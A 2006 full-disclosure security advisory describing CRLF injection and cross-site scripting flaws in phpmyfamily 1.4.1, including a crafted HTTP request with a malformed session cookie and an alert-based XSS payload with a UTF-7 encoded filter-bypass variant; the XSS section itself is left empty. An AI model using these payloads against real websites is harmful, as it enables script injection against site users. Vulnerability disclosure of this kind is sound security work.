SecurityvulnsSECURITYVULNS:DOC:11967[Full-disclosure] HYSA-2006-007 phpmyfamily 1.4.1 CRLF injection & XSS
HYSA-2006-007 h4cky0u.org Advisory 016
Date - Mon March 27 2006
TITLE:
phpmyfamily v1.4.1 CRLF injection & XSS
SEVERITY:
Medium
SOFTWARE:
phpmyfamily v1.4.1
INFO:
phpmyfamily is a dynamic genealogy website builder which allows
geographically dispersed family members to maintain a central database of
research which is readily accessable and editable.
DESCRIPTION:
–== CRLF Injection ==–
GET /phpmyfamily/ HTTP/1.0
Accept: /
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0)
Host: 127.0.0.1:80
Cookie: PHPSESSID=-4-2-=674sdasaf_
Connection: Close
Warning: session_start() [function.session-start]: The session id contains
illegal characters, valid characters are a-z, A-Z,
0-9 and '-,' in C:\AppServ\www\phpmyfamily\inc\config.inc.php on line 88
You can try to encode <script>alert('matrix_killer');</script> in Utf-7 like
this:
+ADw-+AHM-+AGM-+AHI-+AGk-+AHA-+AHQ-+AD4- alert('matrix_killer');
+ADw-/+AHM-+AGM-+AHI-+AGk-+AHA-+AHQ-+AD4-
This way you can bypass the protection, but I'm not sure that it will work.
For me it didn't but I'm still a beginner with
the crlf attacks.
–== XSS ==–
VENDOR STATUS:
Vendor was contacted but no response received till date.
CREDITS:
This vulnerability was discovered and researched by matrix_killer of h4cky0u
Security Forums.
mail : matrix_k at abv.bg
web : http://www.h4cky0u.org
Co-Researcher:
h4cky0u of h4cky0u Security Forums.
mail : h4cky0u at gmail.com
web : http://www.h4cky0u.org
Greets to all omega-team members + krassswr,EcLiPsE and all who support us
!!!
ORIGINAL ADVISORY:
http://www.h4cky0u.org/advisories/HYSA-2006-007-phpmyfamily.txt
–
http://www.h4cky0u.org
(In)Security at its best…